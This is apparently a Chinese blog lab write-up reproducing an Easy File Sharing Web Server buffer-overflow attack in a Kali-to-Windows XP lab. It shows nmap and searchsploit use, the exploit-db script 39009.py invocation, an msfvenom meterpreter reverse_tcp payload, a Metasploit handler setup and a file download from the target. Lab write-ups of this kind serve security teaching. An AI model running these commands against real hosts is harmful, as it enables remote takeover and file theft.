easy file sharing server 漏洞复现

最新推荐文章于 2023-12-20 23:32:08 发布
最新推荐文章于 2023-12-20 23:32:08 发布
阅读量514 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63016521/article/details/128020872
版权

文章目录

  • 实验步骤

二、实验步骤

1:将解压好的easy file sharing web server 拖进xp中安装

2:在xp中打开easy file sharing

3:打开kali 输入ifconfig 并扫描位于同一网段下的存活的主机和其开放的端口

4:使用命令nmap -sV 192.168.179.131 扫描开放端口服务的版本信息

5:使用命令searchsploit easy file sharing 查找渗透模块

6:运行python脚本

路径:/usr/share/exploitdb/windows/remote/39009.py
命令:python /usr/share/exploitdb/windows/remote/39009.py 192.168.179.131 8080

7打开xp靶机即可看到计算器被调用了。

2:

在kali终端中输入msfvenom -p windows/meterpreter/reverse_tcp lhost =192.168.179.132(kali的ip) lport=5000 -f exe -o /home/kali/payload.exe

将生成的payload.exe 拖到xp虚拟机中

在kali终端中输入msfconsole打开metasploit

使用攻击模块,在kali终端中输入

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.179.132

Set lport 5000

Exploit

在xp中运行生成的payload

Kali连接上xp

这里事先在xp的c盘下新建了一个名为hacker.txt文件

使用命令download c:\\test.txt

以root打开kali 在root中可以看到下载的test.txt文件

打不过你菜菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2598
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 中文版 EFS Web Server7.
实验--easyfilesharing
wow_iamfree的博客
10-17 1578
1.启easyfilesharing 2.查看本机ip(这里为我手机热点连接,看WLAN下的ip) 3.修改好easyfilesharing的访问地址和开发端口,并访问一下 主机上可访问,已经正常启动 4.用虚拟机扫描查看开放的的端口和对应服务 nmap -T4 -V -sV 192.168.43.246 可以看出我的主机开放了一些端口并提供了一些对应的服务,其中8000端口开放了http服务,并显示了其端口上运行软件的版本(稍后会自行百度查找其他的端口开放服务) 既然开放了http服务,就从kal
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1081
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
Easy File Sharing Web Server(缓冲区溢出漏洞)
Coffilater的博客
12-13 3425
缓冲区溢出简介 缓冲区溢出是指计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出缓冲区溢出。 Easy File Sharing Web Server 漏洞 实验环境: 攻击机:kali L
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 7.2:文件分享与安全风险》 Easy File Sharing Web Server(简称EFSWS)是一款广泛使用的文件分享软件,它使用户能够通过网页浏览器轻松实文件的上传和下载。该软件设计简洁,...
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速...
easy.file.sharing.web.server.v6.9.rar.7z
12-14
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架...
Easy File Sharing Web Server v5.5
11-06
Easy File Sharing Web Server v5.5:便捷的文件共享解决方案》 Easy File Sharing Web Server v5.5 是一款专为个人和小型企业设计的网络软件,它提供了一个直观且高效的平台,使得用户可以通过Web浏览器轻松地...
漏洞渗透测试easy file sharing server
qq_61947585的博客
11-21 760
渗透测试 easy file sharing server
Easy File Sharing Server7.2漏洞
aarong的博客
11-04 1602
easy file sharing server7.2漏洞 漏洞简述 easy file sharing server缓冲区漏洞 实验环境 攻击机:kali linux 靶机:windows(这里我使用的靶机是winsever2003) 配置在同一网络环境下(同网段) 过程 (1)首先在靶机中安装easy file sharing server软件 (2)因为靶机有IIS可以占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart: (3)打开网站查看是否修改成功 (4)
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 1966
目录 漏洞介绍 环境准备 过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
漏洞Easy File Sharing Web Server 漏洞的简单利用
最新发布
qq_44655084的博客
12-20 1082
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 436
实验过程 首先在电脑上打开easy file sharing web server 并设置好端口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000端口,并将指定代码发送过去 执行完成后,easy file sharing we
easy file sharing漏洞任务
m0_60466340的博客
11-16 3331
在开始利用漏洞之前需要将靶机与进行攻击的主机连接在同一子网下。 网络连接好之后,查找kali的IP地址 之后就可以用nmap扫描同一子网下的所有主机的IP地址了 可以找出靶机的IP地址,再用nmap -sV命令对靶机上运行的服务和软件进行测试 可以看到目标主机的80端口上运行有easy file sharing 这个软件, 然后我们就可以利用这个软件的漏洞了。 再kali的终端查找和easy file sharing相关的漏洞模块 ~# searchsploit easy file s
Kali Linux 基于Easy File Sharing Web Server 6.9 编写漏洞渗透模块 (上)
xujing19920814的博客
10-05 1345
可以实对简单文件共享Web服务器的登录测试简单文件共享Web服务器是否存在溢出漏洞。方法很简单,向目标程序发送一个足够长的用户名,查看目标程序的反应即可。我们需要使用pattern_create.rb来产生10000个字符,命令如下可以确定SEH的偏移量为4059这个命令执行的结果是生成,C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt文件。只有其中不受SafeSEH机制保护的才可以使用,也就是表中SafeSEH列值为False的。
easy flie漏洞与metasploit被控生成
qq_53099802的博客
11-22 3480
easy flie sharing server漏洞的应用 首先,将easy file sharing server放入靶机(通过文件共享放入) 打开它 配置8000端口 在kali中输入 ,可观察到可用脚本,39009 searchsploit Easy File Sharing Web Server 再输入 python /usr/share/exploitdb/exploits/windows/remote/39009.py 开发靶机的ip 8000 最后观察...
quick easy ftp server
03-16
"Quick Easy FTP Server" 是一个易于使用的 FTP 服务器软件,可以帮助用户在计算机上建立 FTP 服务器并与其他设备共享文件。 该软件提供了一个简单的用户界面,使得用户可以轻松地配置 FTP 服务器。用户只需要指定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值